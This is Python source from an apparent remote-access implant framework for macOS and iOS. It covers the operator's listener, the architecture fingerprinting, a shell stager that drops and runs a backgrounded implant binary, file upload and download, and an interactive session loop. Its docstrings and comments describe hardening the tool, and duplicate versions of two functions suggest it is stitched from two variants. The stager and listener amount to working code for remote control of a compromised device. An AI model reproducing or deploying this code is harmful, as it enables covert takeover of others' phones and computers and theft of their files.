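def set_host_port(self):
    """Prompt the operator for the local callback host and port.

    The host defaults to ``h.getip()`` and the port to 4444 when the
    operator just presses enter. The port must be an integer in
    1024..65535; the original only rejected values below 1024, so an
    out-of-range value such as 70000 passed validation here and could
    only fail later.

    On success sets ``self.host`` (the name resolved to an IPv4 address)
    and ``self.port`` and returns True. Returns False when the host name
    cannot be resolved (previously ``socket.gaierror`` propagated to the
    caller), and None when the operator presses Ctrl-C.
    """
    try:
        lhost = h.getip()
        choice = raw_input(h.info_general_raw("Local Host: "))
        if choice != "":
            lhost = choice
        while True:
            lport = raw_input(h.info_general_raw("Local Port: "))
            if not lport:
                lport = 4444
            try:
                lport = int(lport)
            except ValueError:
                h.info_error("Invalid port, please enter a valid integer.")
                continue
            # The listener runs unprivileged: refuse the privileged range
            # and anything outside the 16-bit TCP port space.
            if lport < 1024:
                h.info_error("Invalid port, please enter a value >= 1024.")
                continue
            if lport > 65535:
                h.info_error("Invalid port, please enter a value <= 65535.")
                continue
            break
        h.info_general("Using " + lhost + ":" + str(lport) + "...")
        try:
            self.host = socket.gethostbyname(lhost)
        except socket.gaierror as e:
            h.info_error("Could not resolve " + lhost + ": " + str(e))
            return False
        self.port = lport
        return True
    except KeyboardInterrupt:
        return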
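def upload_file(self, file_path, remote_dir, remote_file_name):
    """Send a local file to the remote session as ``remote_dir/remote_file_name``.

    Wire format, as written by this method: one JSON header
    ``{"cmd": "upload", "args": <json of {size, path, filename}>, "term": <hex>}``
    via ``self.sock_send``, then the file body in 1024-byte chunks, then the
    random ``term`` marker so the remote side can tell where the body ends.

    Fixes over the original: the file handle is closed (``with``); the chunk
    count uses floor division so it also works under Python 3; ``term`` is
    always a text string (``hexlify`` returns bytes on Python 3, which
    ``json.dumps`` rejects); the unused ``name`` local is gone.

    If ``file_path`` does not exist an error is printed and nothing is sent.
    """
    # 32 hex chars from os.urandom: the remote cannot predict the marker, so
    # file contents cannot collide with it by accident or on purpose.
    term = binascii.hexlify(os.urandom(16))
    if not isinstance(term, str):
        term = term.decode("ascii")
    if not os.path.exists(file_path):
        h.info_error("Local file: " + file_path + ": does not exist!")
        return
    with open(file_path, "rb") as f:
        data = f.read()
    size = len(data)
    cmd_data = json.dumps({
        "cmd": "upload",
        "args": json.dumps({
            "size": size,
            "path": remote_dir,
            "filename": remote_file_name
        }),
        "term": term
    })
    self.sock_send(cmd_data)
    chunk_size = 1024
    # Same chunk count as before (size // 1024 + 1): when size is an exact
    # multiple of 1024 the final chunk is empty. Kept as-is because the
    # remote's handling of sock_send framing is not visible here.
    for i in range((size // chunk_size) + 1):
        start = i * chunk_size
        self.sock_send(data[start:start + chunk_size])
    self.sock_send(term)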
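def download_file(self, path):
    """Fetch the remote file at ``path`` and return its bytes.

    Sends ``{"cmd": "download", "args": path}`` through ``self.send_command``
    and parses the JSON reply. On ``status`` 1 the reply carries ``size`` and
    the file body follows on the socket, read with
    ``self.sock_receive_data(size)``.

    Returns the received data, or None when the remote reports an error
    (status 0 or 2), the reply lacks ``size``, or the status is unknown.
    The last two cases previously returned None silently; they now print
    an error like the others.
    """
    raw = self.send_command({"cmd": "download", "args": path})
    result = json.loads(raw)
    status = result.get("status")
    if status == 1:
        if "size" not in result:
            h.info_error("Remote file: " + path + ": malformed response (no size)!")
            return
        return self.sock_receive_data(int(result["size"]))
    if status == 0:
        h.info_error("Remote file: " + path + ": does not exist!")
    elif status == 2:
        # NOTE(review): same wording as status 0; what the agent means by
        # status 2 is not visible here -- confirm against the remote side.
        h.info_error("Remote file: " + path + ": does not exist!")
    else:
        h.info_error("Remote file: " + path + ": unexpected status " + str(status) + "!")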
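def listen_for_stager(self):
    """Wait for the shell stager to call back, fingerprint it and push the implant.

    Flow: accept one TCP connection on 0.0.0.0:``self.port`` (all interfaces;
    the target connects back to us), send a shell snippet that prints
    ``uname -p`` (or ``uname`` when that is "unknown"), pick the matching
    binary with ``self.craft_payload``, stream the bash stager and then the
    executable, close that connection, and hand the still-listening socket
    to ``self.listen_for_executable_payload`` for the implant's connection.

    Fixes over the original: ``sendall`` replaces ``send`` -- ``send`` may
    write only part of a large executable, leaving the remote to exec a
    truncated file; the listening socket and the stager connection are
    closed on every early-exit path; ``craft_payload`` returning None is
    handled explicitly instead of through the TypeError from unpacking it,
    and the reason is printed before the "Press enter" prompt.

    Returns whatever ``listen_for_executable_payload`` returns, or None on
    Ctrl-C, an empty fingerprint, a payload error or a connection error.
    """
    # Runs inside the remote shell; its stdout is the architecture string.
    identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('0.0.0.0', self.port))
    s.listen(1)
    self.verbose_print("Listening on port " + str(self.port) + "...")
    try:
        conn, addr = s.accept()
    except KeyboardInterrupt:
        s.close()
        return
    hostAddress = addr[0]
    self.verbose_print("Connecting to " + hostAddress + "...")
    try:
        conn.sendall(identification_shell_command)
        # Remote-controlled string: only ever used as a lookup key inside
        # craft_payload, never interpolated into a command.
        device_arch = conn.recv(128).strip()
        if not device_arch:
            s.close()
            return
        try:
            crafted = self.craft_payload(device_arch)
        except Exception as e:
            h.info_error("Error: " + str(e))
            crafted = None
        if crafted is None:
            s.close()
            raw_input("Press enter to continue...")
            return
        bash_stager, executable = crafted
        self.verbose_print("Sending Mouse Payload...")
        self.debug_print(bash_stager.strip())
        conn.sendall(bash_stager)
        self.debug_print("Sending Mouse Executable...")
        conn.sendall(executable)
    except BaseException:
        # Connection dropped mid-transfer (or Ctrl-C at the prompt): do not
        # leave the port bound.
        s.close()
        raise
    finally:
        conn.close()
    self.verbose_print("Establishing Connection...")
    try:
        return self.listen_for_executable_payload(s)
    except ssl.SSLError as e:
        h.info_error("SSL error: " + str(e))
    except Exception as e:
        h.info_error("Error: " + str(e))
    s.close()
    return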
def interact(self):
    """Drive the interactive prompt for this session until exit/back.

    Each input line is split into the first whitespace-separated word
    (the command) and the rest of the line after that word and one
    separator character (the args). Dispatch order: built-ins ``exit``
    (disconnect and leave), ``back`` (leave, only when the server is
    multi-session) and ``help``; then the modules for this session type
    from ``self.server.get_modules(self.type)``; then
    ``self.server.modules_local``. Anything else prints an error. While
    ``self.needs_refresh`` is set the line is read and dropped.

    Ctrl-C with text pending in the readline buffer prints a newline and
    re-prompts; Ctrl-C on an empty line disconnects and returns. Any other
    exception raised by a module is printed and the loop continues.
    """
    readline.clear_history()
    readline.set_completer(self.tab_complete)
    readline.parse_and_bind('tab: complete')
    command_modules = self.server.get_modules(self.type)
    while True:
        try:
            line = raw_input(self.get_handle()).strip(" ")
            if not line or line.replace(" ", "") == "":
                continue
            cmd = line.split()[0]
            cmd_data = {"cmd": cmd, "args": line[len(cmd) + 1:]}
            if self.needs_refresh:
                # session is mid-update: ignore input until it settles
                continue
            if cmd == "exit":
                self.disconnect(True)
                return
            if cmd == "back" and self.server.is_multi:
                return
            if cmd == "help":
                self.show_commands()
            elif cmd in command_modules:
                command_modules[cmd].run(self, cmd_data)
            elif cmd in self.server.modules_local:
                self.server.modules_local[cmd].run(self, cmd_data)
            else:
                h.info_error("Unrecognized command!")
        except KeyboardInterrupt:
            try:
                print("")
                if readline.get_line_buffer():
                    continue
            except:
                # deliberately broad: a second Ctrl-C here still falls
                # through to the disconnect below
                pass
            self.disconnect(True)
            return
        except Exception as e:
            print(e)
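def craft_payload(self, device_arch):
    """Build the (shell stager, executable bytes) pair for ``device_arch``.

    ``device_arch`` is the remote's ``uname -p``/``uname`` output and is
    only compared against ``self.macos_architectures`` and
    ``self.ios_architectures``. The stager is a one-line shell snippet:
    ``cat`` the bytes that follow it on the connection into a temp path,
    make it executable, rename it, and run it in the background with the
    base64-encoded callback parameters
    ``{"ip": self.host, "port": self.port, "debug": self.debug}``.

    Returns ``(instructions, payload)``, or None (after printing why) when
    host/port are unset or the architecture is unknown. Raises IOError if
    the binary under ``resources/`` is missing; that path is relative to
    the current working directory.

    Fixes over the original: the dropped binary gets mode 0755 instead of
    0777 -- world-writable meant any other local user on the target could
    replace it between the chmod and the exec; the payload file is read
    with ``with`` so the handle is closed even if ``read()`` fails.
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        h.info_error("Local Host is not set")
        return
    if not self.port:
        h.info_error("Local Port is not set")
        return
    # Assumes h.b64 is standard base64 (A-Za-z0-9+/=): those characters are
    # safe to pass unquoted on the shell command line below.
    payload_parameter = h.b64(json.dumps({"ip": self.host, "port": self.port, "debug": self.debug}))
    if device_arch in self.macos_architectures:
        self.verbose_print("Detected macOS")
        with open("resources/mplmacos", "rb") as f:
            payload = f.read()
        # write to a temp name first, rename once complete, then exec
        instructions = \
            "cat >/private/tmp/tmpmpl;" + \
            "chmod 755 /private/tmp/tmpmpl;" + \
            "mv /private/tmp/tmpmpl /private/tmp/mpl;" + \
            "/private/tmp/mpl " + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Detected iOS")
        with open("resources/mplios", "rb") as f:
            payload = f.read()
        instructions = \
            "cat >/tmp/tmpmpl;" + \
            "chmod 755 /tmp/tmpmpl;" + \
            "mv /tmp/tmpmpl /.mpl;" + \
            "/.mpl " + payload_parameter + " 2>/dev/null &\n"
        return (instructions, payload)
    else:
        h.info_error("The device is not recognized!")
        return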
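def listen_for_stager(self):
    """Wait for the shell stager to call back, fingerprint it and push the implant.

    Flow: accept one TCP connection on 0.0.0.0:``self.port`` (all interfaces;
    the target connects back to us), send a shell snippet that prints
    ``uname -p`` (or ``uname`` when that is "unknown"), pick the matching
    binary with ``self.craft_payload``, stream the bash stager and then the
    executable, close that connection, and hand the still-listening socket
    to ``self.listen_for_executable_payload`` for the implant's connection.
    Status messages are printed only when ``self.is_multi`` is False.

    Fixes over the original: ``sendall`` replaces ``send`` -- ``send`` may
    write only part of a large executable, leaving the remote to exec a
    truncated file; the listening socket and the stager connection are
    closed on every early-exit path; ``craft_payload`` returning None is
    handled explicitly instead of through the TypeError from unpacking it.

    Returns whatever ``listen_for_executable_payload`` returns, or None on
    Ctrl-C, an empty fingerprint, a payload error or a connection error.
    """
    # Runs inside the remote shell; its stdout is the architecture string.
    identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind(('0.0.0.0', self.port))
    s.listen(1)
    if self.is_multi == False:
        h.info_general("Listening On Port --> " + str(self.port) + ".....")
    try:
        conn, addr = s.accept()
    except KeyboardInterrupt:
        s.close()
        return
    hostAddress = addr[0]
    if self.is_multi == False:
        h.info_general("Establishing Connection To " + hostAddress)
    try:
        conn.sendall(identification_shell_command)
        # Remote-controlled string: only ever used as a lookup key inside
        # craft_payload, never interpolated into a command.
        device_arch = conn.recv(128).strip()
        if not device_arch:
            s.close()
            return
        try:
            crafted = self.craft_payload(device_arch)
        except Exception as e:
            h.info_error(str(e))
            crafted = None
        if crafted is None:
            s.close()
            raw_input("Please Press Enter To Continue Further!")
            return
        bash_stager, executable = crafted
        if self.is_multi == False:
            h.info_general("Sending Payload...")
        conn.sendall(bash_stager)
        conn.sendall(executable)
    except BaseException:
        # Connection dropped mid-transfer (or Ctrl-C at the prompt): do not
        # leave the port bound.
        s.close()
        raise
    finally:
        conn.close()
    if self.is_multi == False:
        h.info_general("Establishing Secure Connection...")
    try:
        return self.listen_for_executable_payload(s)
    except ssl.SSLError as e:
        h.info_error("SSL error: " + str(e))
    except Exception as e:
        h.info_error("Error: " + str(e))
    s.close()
    return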
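def craft_payload(self, device_arch):
    """Build the (shell stager, executable bytes) pair for ``device_arch``.

    ``device_arch`` is the remote's ``uname -p``/``uname`` output and is
    only compared against ``self.macos_architectures`` and
    ``self.ios_architectures``. The stager is a one-line shell snippet:
    ``cat`` the bytes that follow it on the connection into a temp path,
    make it executable (iOS: also rename it to ``/.mouse``), and run it in
    the background with the base64-encoded callback parameters
    ``{"ip": self.host, "port": self.port, "debug": self.debug}``.

    Returns ``(instructions, payload)``, or None (after printing why) when
    host/port are unset or the architecture is unknown. Raises IOError if
    the binary under ``data/payloads/`` is missing; that path is relative
    to the current working directory.

    Fixes over the original: the dropped binary gets mode 0755 instead of
    0777 -- world-writable meant any other local user on the target could
    replace it between the chmod and the exec; the payload file is read
    with ``with`` so the handle is closed even if ``read()`` fails.
    """
    # TODO: Detect uid before we send executable
    if not self.host:
        h.info_error("Local Host is not set!")
        return
    if not self.port:
        h.info_error("Local Port is not set!")
        return
    # Assumes h.b64 is standard base64 (A-Za-z0-9+/=): those characters are
    # safe to pass unquoted on the shell command line below.
    payload_parameter = h.b64(
        json.dumps({
            "ip": self.host,
            "port": self.port,
            "debug": self.debug
        }))
    if device_arch in self.macos_architectures:
        self.verbose_print("Connecting to macOS...")
        self.verbose_print("Sending macOS Payload...")
        with open("data/payloads/macos", "rb") as f:
            payload = f.read()
        # macOS: drop into /private/tmp and exec in place
        instructions = \
            "cat >/private/tmp/mouse;" + \
            "chmod 755 /private/tmp/mouse;" + \
            "/private/tmp/mouse " + payload_parameter + " 2>/dev/null &\n"
        self.verbose_print("Executing macOS Payload...")
        return (instructions, payload)
    elif device_arch in self.ios_architectures:
        self.verbose_print("Connecting to iOS...")
        self.verbose_print("Sending iOS Payload...")
        with open("data/payloads/ios", "rb") as f:
            payload = f.read()
        instructions = \
            "cat >/tmp/mouse;" + \
            "chmod 755 /tmp/mouse;" + \
            "mv /tmp/mouse /.mouse;" + \
            "/.mouse " + payload_parameter + " 2>/dev/null &\n"
        self.verbose_print("Executing iOS Payload...")
        return (instructions, payload)
    else:
        h.info_error("The device is not recognized!")
        return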